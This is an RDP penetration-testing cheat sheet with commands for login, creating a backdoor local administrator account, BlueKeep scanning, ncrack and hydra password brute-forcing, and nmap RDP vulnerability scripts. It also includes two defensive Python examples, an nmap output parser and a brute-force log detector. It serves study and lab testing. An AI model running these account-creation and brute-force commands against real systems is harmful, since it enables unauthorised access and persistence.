RDP 3389

1. RDP Login:

To login to a remote machine using RDP:

  • Using rdesktop (for older systems):

    rdesktop -u DISCO 10.11.1.13
  • Using xfreerdp (more modern, cross-platform):

    xfreerdp /u:admin /v:10.10.10.10 +clipboard

2. Add a User and Grant Privileges:

  • Create a User:

    net user redcliff password123 /add
  • Add the User to Administrator Group:

    net localgroup Administrators redcliff /add
  • Add the User to Remote Desktop Users Group:

    net localgroup "Remote Desktop Users" redcliff /add

3. RDP Vulnerability Scanning (BlueKeep):

  • Clone rdpscan Repository and run a scan:

    git clone https://github.com/robertdavidgraham/rdpscan.git
    cd rdpscan && make
    ./rdpscan 10.10.10.10
  • Scan for BlueKeep Vulnerability Using Metasploit: First, perform an Nmap scan to identify live RDP targets:

    nmap -p3389 -T5 <subnet>/24 -oG - | awk '/Up$/{print $2}' > rdp.lst

    Then use Metasploit to run the BlueKeep scanner:

    msfconsole
    > use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
    > set RHOSTS file:<path to rdp.lst>
    > run
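Note on the awk filter above: `/Up$/` matches nmap's host-status line, so rdp.lst contains every host that answered discovery, not only those with 3389 open. The parser below is an added Python example (not from this page or from nmap) that reads the same `-oG` format and separates "host up" from "3389 open"; the `SAMPLE_GREPABLE` text is a constructed sample, not real scan output.

```python
import re

# Constructed sample of nmap grepable output (-oG) for a -p3389 scan; not real scan data.
# Fields on a "Host:" line are tab-separated; the port list is comma-separated.
SAMPLE_GREPABLE = (
    "# Nmap 7.94 scan initiated (constructed sample)\n"
    "Host: 10.10.10.5 ()\tStatus: Up\n"
    "Host: 10.10.10.5 ()\tPorts: 3389/open/tcp//ms-wbt-server///\n"
    "Host: 10.10.10.6 ()\tStatus: Up\n"
    "Host: 10.10.10.6 ()\tPorts: 3389/closed/tcp//ms-wbt-server///\n"
    "Host: 10.10.10.7 (files.example.test)\tStatus: Up\n"
    "Host: 10.10.10.7 (files.example.test)\tPorts: 3389/filtered/tcp//ms-wbt-server///\n"
    "# Nmap done (constructed sample)\n"
)

# port/state/protocol/... e.g. "3389/open/tcp//ms-wbt-server///"
PORT_RE = re.compile(r"^(\d+)/(\w+)/(\w+)/")


def parse_grepable(text):
    """Parse -oG text into {host: {"status": str|None, "ports": {port: state}}}."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:"):
            continue                      # skip comment and blank lines
        fields = line.split("\t")
        host = fields[0].split()[1]       # "Host: 10.10.10.5 ()" -> "10.10.10.5"
        rec = hosts.setdefault(host, {"status": None, "ports": {}})
        for field in fields[1:]:
            key, _, value = field.partition(": ")
            if key == "Status":
                rec["status"] = value.strip()
            elif key == "Ports":
                for entry in value.split(","):
                    m = PORT_RE.match(entry.strip())
                    if m:
                        rec["ports"][int(m.group(1))] = m.group(2)
    return hosts


def hosts_up(text):
    """Equivalent of the awk '/Up$/' filter: every host nmap marked Up."""
    return sorted(h for h, r in parse_grepable(text).items() if r["status"] == "Up")


def hosts_with_open_port(text, port):
    """Hosts where the given port was reported open (the ones actually exposing RDP)."""
    return sorted(h for h, r in parse_grepable(text).items()
                  if r["ports"].get(port) == "open")


if __name__ == "__main__":
    print("up:       ", hosts_up(SAMPLE_GREPABLE))
    print("3389 open:", hosts_with_open_port(SAMPLE_GREPABLE, 3389))
```

On the constructed sample, `hosts_up` returns all three hosts while `hosts_with_open_port(..., 3389)` returns only 10.10.10.5; feeding the narrower list to a checker keeps results accurate and avoids noise against hosts where the port is closed or filtered.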

4. Brute-Forcing RDP:

  • Brute-force RDP with ncrack:

    ncrack -vv --user DISCO -P passwords.txt rdp://10.11.1.1
    sudo ncrack -vv --user peter -P /usr/share/wordlists/rockyou.txt rdp://10.11.1.11:3389
  • Brute-force RDP with hydra:

    hydra -V -f -L DISCO.txt -P passwords.txt rdp://10.11.1.13
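From the defender's side, the ncrack/hydra runs above leave a burst of Windows Security event 4625 (failed logon) with LogonType 10 (RemoteInteractive) from one source IP. The following is an added Python example, not from this page or any tool it lists, that detects that pattern over a constructed log export; the pipe-separated export format, the threshold of 5 failures per 60 seconds and the 5-minute follow-up window are assumptions chosen for the example.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample export from the Windows Security log, one event per line:
# time|EventID|LogonType|TargetUserName|IpAddress   (4625 = failed logon,
# 4624 = successful logon, LogonType 10 = RemoteInteractive, i.e. RDP).
SAMPLE_EVENTS = """\
2024-05-01T10:00:01|4625|10|DISCO|10.11.1.50
2024-05-01T10:00:03|4625|10|DISCO|10.11.1.50
2024-05-01T10:00:05|4625|10|peter|10.11.1.50
2024-05-01T10:00:08|4625|10|peter|10.11.1.50
2024-05-01T10:00:12|4625|10|admin|10.11.1.50
2024-05-01T10:00:15|4625|10|admin|10.11.1.50
2024-05-01T10:00:20|4624|10|admin|10.11.1.50
2024-05-01T10:00:30|4625|10|alice|10.11.1.60
2024-05-01T10:05:00|4625|10|alice|10.11.1.60
2024-05-01T10:06:00|4625|3|svc|10.11.1.70
"""


def parse_events(text):
    """Parse the pipe-separated export into dicts sorted by time."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, event_id, logon_type, user, ip = line.split("|")
        events.append({
            "time": datetime.fromisoformat(ts),
            "event_id": int(event_id),
            "logon_type": int(logon_type),
            "user": user,
            "ip": ip,
        })
    return sorted(events, key=lambda e: e["time"])


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(seconds=60),
                          followup=timedelta(minutes=5)):
    """Flag source IPs with >= threshold RDP logon failures inside a sliding window.

    Returns {ip: {"first_seen", "last_failure", "failures", "users", "success_after"}}.
    success_after is the account name if an RDP logon from the same IP succeeded
    within `followup` of the last failure (the case to escalate first).
    """
    recent = defaultdict(deque)       # ip -> failures still inside the window
    total_failures = defaultdict(int)
    alerts = {}
    for ev in events:
        if ev["logon_type"] != 10:    # only RemoteInteractive (RDP) logons
            continue
        ip = ev["ip"]
        if ev["event_id"] == 4625:
            total_failures[ip] += 1
            q = recent[ip]
            q.append(ev)
            while q and ev["time"] - q[0]["time"] > window:
                q.popleft()
            if len(q) >= threshold or ip in alerts:
                alert = alerts.setdefault(ip, {
                    "first_seen": q[0]["time"], "users": set(), "success_after": None,
                })
                alert["last_failure"] = ev["time"]
                alert["failures"] = total_failures[ip]
                alert["users"].update(e["user"] for e in q)
        elif ev["event_id"] == 4624 and ip in alerts:
            alert = alerts[ip]
            if ev["time"] - alert["last_failure"] <= followup:
                alert["success_after"] = ev["user"]
    return alerts


if __name__ == "__main__":
    for ip, a in detect_rdp_bruteforce(parse_events(SAMPLE_EVENTS)).items():
        print(ip, a["failures"], "failures, users:", sorted(a["users"]),
              "success after burst:", a["success_after"])
```

On the sample, 10.11.1.50 is flagged (6 failures across three accounts in 14 seconds, followed by a successful logon as `admin`), while 10.11.1.60 (two failures minutes apart) and the LogonType 3 event are ignored. A successful RDP logon shortly after a failure burst is the condition to respond to first; the account-lockout policy and Network Level Authentication are the usual mitigations.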

5. Nmap RDP Enumeration Scripts:

  • RDP Service Enumeration:

    nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 10.11.1.1
  • Check for MS12-020 Vulnerability:

    nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11

6. Microsoft Terminal Services (MS-WBT-SERVER):

You can identify the MS Terminal Services (RDP) version and potential vulnerabilities using Nmap:

  • Scan for RDP Vulnerabilities (MS-WBT-SERVER):

    nmap -sV -Pn --script=rdp-vuln-ms12-020 -p 3389 10.11.1.11
